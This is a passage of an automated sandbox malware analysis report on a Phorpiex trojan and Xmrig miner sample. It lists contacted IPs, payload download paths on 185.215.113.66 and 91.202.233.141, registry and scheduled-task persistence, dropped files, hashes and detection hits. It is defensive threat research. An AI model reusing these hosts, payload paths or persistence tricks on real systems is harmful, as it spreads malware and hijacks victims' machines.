                                                                                                                                                                              		unknownKazakhstan
                                                                                                                                                                              		9198KAZTELECOM-ASKZtrue
                                                                                                                                                                              94.230.236.63
                                                                                                                                                                              		unknownUzbekistan
                                                                                                                                                                              		29385BUZTON-JV-ASUZtrue
                                                                                                                                                                              2.178.73.57
                                                                                                                                                                              		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                              		12880DCI-ASIRfalse
                                                                                                                                                                              5.133.123.159
                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                              		200752TIET-ASITtrue
                                                                                                                                                                              217.30.162.161
                                                                                                                                                                              		unknownUzbekistan
                                                                                                                                                                              		39032ISPETCUZtrue
                                                                                                                                                                              185.203.237.228
                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                              		44493CHELYABINSK-SIGNAL-ASRUfalse
                                                                                                                                                                              90.156.162.72
                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                              		25532MASTERHOST-ASMoscowRussiaRUtrue
                                                                                                                                                                              95.58.91.70
                                                                                                                                                                              		unknownKazakhstan
                                                                                                                                                                              		9198KAZTELECOM-ASKZtrue
                                                                                                                                                                              95.59.165.102
                                                                                                                                                                              		unknownKazakhstan
                                                                                                                                                                              		9198KAZTELECOM-ASKZfalse
                                                                                                                                                                              59.91.192.122
                                                                                                                                                                              		unknownIndia
                                                                                                                                                                              		9829BSNL-NIBNationalInternetBackboneINfalse
                                                                                                                                                                              198.163.193.96
                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                              		7029WINDSTREAMUSfalse
                                                                                                                                                                              213.206.39.40
                                                                                                                                                                              		unknownUzbekistan
                                                                                                                                                                              		29385BUZTON-JV-ASUZfalse
                                                                                                                                                                              185.215.113.84
                                                                                                                                                                              		unknownPortugal
                                                                                                                                                                              		206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                              92.46.174.254
                                                                                                                                                                              		unknownKazakhstan
                                                                                                                                                                              		9198KAZTELECOM-ASKZtrue
                                                                                                                                                                              94.230.235.140
                                                                                                                                                                              		unknownUzbekistan
                                                                                                                                                                              		29385BUZTON-JV-ASUZtrue
                                                                                                                                                                              37.254.242.74
                                                                                                                                                                              		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                              		58224TCIIRfalse
                                                                                                                                                                              45.248.160.159
                                                                                                                                                                              		unknownIndia
                                                                                                                                                                              		133661NETPLUS-ASNetplusBroadbandServicesPrivateLimitedINfalse
                                                                                                                                                                              187.133.73.5
                                                                                                                                                                              		unknownMexico
                                                                                                                                                                              		8151UninetSAdeCVMXtrue
                                                                                                                                                                              145.249.227.150
                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                              		21299KAR-TEL-ASAlmatyRepublicofKazakhstanKZfalse
                                                                                                                                                                              117.236.188.177
                                                                                                                                                                              		unknownIndia
                                                                                                                                                                              		9829BSNL-NIBNationalInternetBackboneINtrue
                                                                                                                                                                              95.56.76.10
                                                                                                                                                                              		unknownKazakhstan
                                                                                                                                                                              		9198KAZTELECOM-ASKZtrue
                                                                                                                                                                              90.156.160.86
                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                              		25532MASTERHOST-ASMoscowRussiaRUtrue
                                                                                                                                                                              5.202.213.167
                                                                                                                                                                              		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                              		200645GILASSRAYANEHIRtrue
                                                                                                                                                                              178.90.122.209
                                                                                                                                                                              		unknownKazakhstan
                                                                                                                                                                              		9198KAZTELECOM-ASKZfalse
                                                                                                                                                                              46.100.182.167
                                                                                                                                                                              		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                              		58224TCIIRtrue
                                                                                                                                                                              124.109.48.132
                                                                                                                                                                              		unknownPakistan
                                                                                                                                                                              		23674NAYATEL-PKNayatelPvtLtdPKfalse
                                                                                                                                                                              151.244.52.254
                                                                                                                                                                              		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                              		31549RASANAIRfalse
                                                                                                                                                                              239.255.255.250
                                                                                                                                                                              		unknownReserved
                                                                                                                                                                              		unknownunknownfalse
                                                                                                                                                                              5.232.31.242
                                                                                                                                                                              		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                              		58224TCIIRtrue
                                                                                                                                                                              2.181.31.167
                                                                                                                                                                              		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                              		58224TCIIRfalse
                                                                                                                                                                              92.46.228.246
                                                                                                                                                                              		unknownKazakhstan
                                                                                                                                                                              		9198KAZTELECOM-ASKZtrue
                                                                                                                                                                              80.191.218.209
                                                                                                                                                                              		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                              		58224TCIIRfalse

                                                                                                                                                                              General Information

                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                              Analysis ID:1542689
                                                                                                                                                                              Start date and time:2024-10-26 07:25:15 +02:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 10m 28s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:48
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • HCA enabled
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Sample name:lJ4EzPSKMj.exe
                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                              Original Sample Name:ada49c1b3b3d878fe42df213844d8d37ec59ac4f906060556ad901ba0d55b2a9.exe
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal100.troj.evad.mine.winEXE@64/42@2/39
                                                                                                                                                                              EGA Information:
                                                                                                                                                                              • Successful, ratio: 64.3%
                                                                                                                                                                              HCA Information:
                                                                                                                                                                              • Successful, ratio: 75%
                                                                                                                                                                              • Number of executed functions: 91
                                                                                                                                                                              • Number of non-executed functions: 184
                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                              Warnings

                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.72.235.82
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): redir.update.msft.com.trafficmanager.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, www.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                              • Execution Graph export aborted for target 1428024550.exe, PID 6956 because it is empty
                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 5440 because it is empty
                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 5848 because it is empty
                                                                                                                                                                              • Execution Graph export aborted for target winupsecvmgr.exe, PID 5896 because it is empty
                                                                                                                                                                              • Execution Graph export aborted for target winupsecvmgr.exe, PID 6108 because it is empty
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                              • VT rate limit hit for: lJ4EzPSKMj.exe

                                                                                                                                                                              Simulations

                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                              01:26:35API Interceptor248430x Sleep call for process: sysppvrdnvs.exe modified
                                                                                                                                                                              01:26:35API Interceptor108x Sleep call for process: powershell.exe modified
                                                                                                                                                                              01:27:49API Interceptor289x Sleep call for process: conhost.exe modified
                                                                                                                                                                              07:26:32AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                              07:27:29Task SchedulerRun new task: Microsoft Windows Security path: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe

                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                              IPs

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              185.215.113.66thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                              • 185.215.113.66/3
                                                                                                                                                                              bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                              • 185.215.113.66/4
                                                                                                                                                                              file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                              • 185.215.113.66/5
                                                                                                                                                                              dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                              • 185.215.113.66/5
                                                                                                                                                                              GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                              • 185.215.113.66/5
                                                                                                                                                                              0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                              • 185.215.113.66/5
                                                                                                                                                                              file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                              • 185.215.113.66/3
                                                                                                                                                                              SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                              • 185.215.113.66/2
                                                                                                                                                                              file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                              • 185.215.113.66/6
                                                                                                                                                                              file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                              • 185.215.113.66/1
                                                                                                                                                                              198.163.193.230SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                5.76.120.41file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  91.202.233.141thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                  • 91.202.233.141/dwntbl
                                                                                                                                                                                  bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 91.202.233.141/5
                                                                                                                                                                                  file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 91.202.233.141/4
                                                                                                                                                                                  dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 91.202.233.141/2
                                                                                                                                                                                  GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 91.202.233.141/4
                                                                                                                                                                                  0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 91.202.233.141/1
                                                                                                                                                                                  file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                  • 91.202.233.141/5
                                                                                                                                                                                  SecuriteInfo.com.Trojan.DownLoader46.2135.11116.25434.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                  • 91.202.233.141/5
                                                                                                                                                                                  file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                  • 91.202.233.141/6
                                                                                                                                                                                  file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                  • 91.202.233.141/5

                                                                                                                                                                                  Domains

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  twizthash.netbBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 185.215.113.66
                                                                                                                                                                                  file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 185.215.113.66
                                                                                                                                                                                  dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 185.215.113.66
                                                                                                                                                                                  GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 185.215.113.66
                                                                                                                                                                                  0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 185.215.113.66
                                                                                                                                                                                  1mqzOM6eok.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                  • 185.215.113.66

                                                                                                                                                                                  ASNs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  KAZTELECOM-ASKZthcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                  • 195.82.3.15
                                                                                                                                                                                  la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 212.13.160.210
                                                                                                                                                                                  la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 178.88.132.57
                                                                                                                                                                                  la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 178.91.19.33
                                                                                                                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 5.251.70.189
                                                                                                                                                                                  D9lexQEfnt.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 95.57.208.93
                                                                                                                                                                                  ai3eCONS9Q.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 95.56.47.35
                                                                                                                                                                                  la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 95.56.219.244
                                                                                                                                                                                  6fLnWSoXXD.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 95.58.131.5
                                                                                                                                                                                  ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 95.57.233.54
                                                                                                                                                                                  WINDSTREAMUSla.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.39.136.54
                                                                                                                                                                                  la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 98.23.44.145
                                                                                                                                                                                  la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 216.215.215.147
                                                                                                                                                                                  la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 64.118.136.21
                                                                                                                                                                                  la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 98.19.174.144
                                                                                                                                                                                  la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 209.178.181.240
                                                                                                                                                                                  botnet.arm5.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                  • 75.91.53.91
                                                                                                                                                                                  botnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                  • 173.186.46.250
                                                                                                                                                                                  botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                  • 216.245.28.77
                                                                                                                                                                                  botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                  • 72.242.215.117
                                                                                                                                                                                  WHOLESALECONNECTIONSNLthcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                  • 185.215.113.66
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 185.215.113.16
                                                                                                                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                  • 185.215.113.16
                                                                                                                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                  • 185.215.113.16
                                                                                                                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                  • 185.215.113.16
                                                                                                                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  WINDSTREAMUSla.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.39.136.54
                                                                                                                                                                                  la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 98.23.44.145
                                                                                                                                                                                  la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 216.215.215.147
                                                                                                                                                                                  la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 64.118.136.21
                                                                                                                                                                                  la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 98.19.174.144
                                                                                                                                                                                  la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 209.178.181.240
                                                                                                                                                                                  botnet.arm5.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                  • 75.91.53.91
                                                                                                                                                                                  botnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                  • 173.186.46.250
                                                                                                                                                                                  botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                  • 216.245.28.77
                                                                                                                                                                                  botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                  • 72.242.215.117
                                                                                                                                                                                  PTC-YEMENNETYEpowerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 178.130.111.195
                                                                                                                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 134.35.25.237
                                                                                                                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 134.35.82.159
                                                                                                                                                                                  la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 94.26.199.5
                                                                                                                                                                                  bBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 5.255.14.2
                                                                                                                                                                                  dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 109.200.190.28
                                                                                                                                                                                  GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 109.200.161.199
                                                                                                                                                                                  0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                  • 46.161.230.77
                                                                                                                                                                                  bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                  • 134.35.148.16
                                                                                                                                                                                  file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                  • 134.35.27.91

                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                  No context

                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nxmr[1].exebBcZoComLl.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                      dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                        GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                          0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                            1mqzOM6eok.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exethcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                                                                                                                  dgiX55cHyU.exeGet hashmaliciousPhorpiex, XmrigBrowse

                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\513318274.exe.log

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\513318274.exe
                                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):425
                                                                                                                                                                                                    Entropy (8bit):5.357964438493834
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                                                                                                                                                                                    MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                                                                                                                                                                                    SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                                                                                                                                                                                    SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                                                                                                                                                                                    SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\3[1]

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16128
                                                                                                                                                                                                    Entropy (8bit):7.988295567506313
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:LrvXDxrJBiEAkcXzGE+qHYhew/F2Nyoot52DzPW7L:LrvXVJ0MUzj+qH6T2Uoot8DzPu
                                                                                                                                                                                                    MD5:1568EFB715BD9797610F55AA48DFB18E
                                                                                                                                                                                                    SHA1:076C40D61A821CF3069508EE873F3D4780774CB3
                                                                                                                                                                                                    SHA-256:F42EF51C4C7C8F607A0405848593369BFC193B771E8ED687540632CAD1376216
                                                                                                                                                                                                    SHA-512:03D4357A8A1FAA9110FB023E4C504BCB284D6665848C2918A543C1928FFAC78FDF573D201932517C23A22A6E50C3DDD9D9035BBF8E735DDAE3BC0FEA8949F7E8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:..[...y.M...x..3+_[./.C.........L..I.........K0p.Pa..G.j.q..r..>.+"M.(....).....nf.....+.m...8`....@.'V...]_...{.1.&......$..".....L+.'l.5........]1Z.!H.|...J.!./.=:jr~.2..T..^R..!t.t..3%_./:.p..@..Z-......9.....aS@..T..x.\...:....).'....D.....A...Ut...R-g.Z>..B.....q.5:9..*.y.nz.4.^...y.n..w.6_.....M7.2..p.jJt.#e.z.SW.h....4{.q.../..br.( o....l.......S..u5nw..;.i#:...X<<T.>.c.R.f.z.gz...D.G......:].....]G.=...s...u.`#Zt...9X.w4.8..~.$YJ.<.....0..}.~...,4..S....J...GJwz.b....yt..;..9...C...#.<$............v....@.0.....`../.".8.b.n...,..]..E-.Vp..Yc....Ga:.q.2o.W..O...........,.N.3#@m..y1.....~-I...-..!m..<fa..^a.k=..Fze..Mq./...(.\..R\)...Kw..x..l.M.7L.........D.. ........G+..m..\.E~......X..t:....|2.E..X......<\..P3,q.D.x.R..G..,~...Ta...Z...~v.{.....z.J[.a..$.y...#..g.R.<....v...\.>....cjn.)?..k.....S..x.P.0....7.@...P..e@....Z.L6....Rv.oe.x.X..OK4......F....o.r'A.8K.%?R...tG..V...B}c7.!8.............=f....&dI$..W..b.O....dh.......}..N.

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\5[1]

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):13568
                                                                                                                                                                                                    Entropy (8bit):7.983903730756248
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:vxmO6QJvutiOSVu3UG1aPa7VaRNCf9hFsczcDZF:v76avEi/iOPa7ocHgL
                                                                                                                                                                                                    MD5:ED9F31BD89B04A64ED7EAC4F9F869F0F
                                                                                                                                                                                                    SHA1:2696ECA64C0461F82037981F81E176895EC01D19
                                                                                                                                                                                                    SHA-256:20A8FB765DB33C4E77824C30FD6D5ECA24495E3EB9919D2EDEEB80B6B9B7208D
                                                                                                                                                                                                    SHA-512:C160C282A48CD0358B0D3F49910D3C9C99B4F126E34E2494AD4E839EDE7058B79B56F84C020FEE6F7DFA9259853AAE750AF52DCCA6AACF822F7121F26BE04205
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:....=....$6K.bMU...{..........qg.....z{V....U..W.....D..W.....}P]s.TK.....3ZW%z...h".......eRb#mH.c,....~ .|Q...p....[.W.;..!.i"R...AB.tF...js..._K..(.5.j....R,.W...eAD.n.~Z8.:p...^5C.LV....`.......Y......u.W.>t...y..\'J............0.4.?=.H.Tic8..1....;V.S.|.....T.h...yT.+m.....q.BLk..O...!...{..L..bR.....<.W.P.O...(r....V.c.......=..Tb'..........'+DZ.E"rJ.:..h}...n.w.1..~..z.:/.;fw.....H.`.^.D...|.....%.......F.......8.M.D........)..A._.u..hi.\:..h.%.~...!a.>.&..cbV.)g.$.V......]...B..g......1.v.@...%....<.+(.{.P..s.....?.'.f#.....[..V.>%}sK..u..~g..W....A0..9....-.#98.w..S..Kf.vZ.g...i<).X.>r.R.j9...[t...6...'G..*.......\.3...+veY..h_9^H......-..'BI..h=..M8....Nz.-n...t>...+......yJ.MpW...PL.k..Py....W.."y....~.&..ecMz..6..s.C!.J`..mS?.2.."..O..R....]N ..x..cx..k.it....9.f#:a.#.C"...Q..l.0p.....{..{......r.tE:..r:.'l.L]!..p.oX...A..d.Oq.........'Fa.|.yM..{x;...!.++..H......}..b...p..p.8.h.;...q.L..L.a.<.x.<....j....\.:...iQ..zec.^.......<.

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\lJ4EzPSKMj.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):85504
                                                                                                                                                                                                    Entropy (8bit):6.394560338648692
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                                                                                    MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                                                                    SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                                                                                    SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                                                                                    SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exe, Author: Joe Security
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: thcdVit1dX.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: dgiX55cHyU.exe, Detection: malicious, Browse
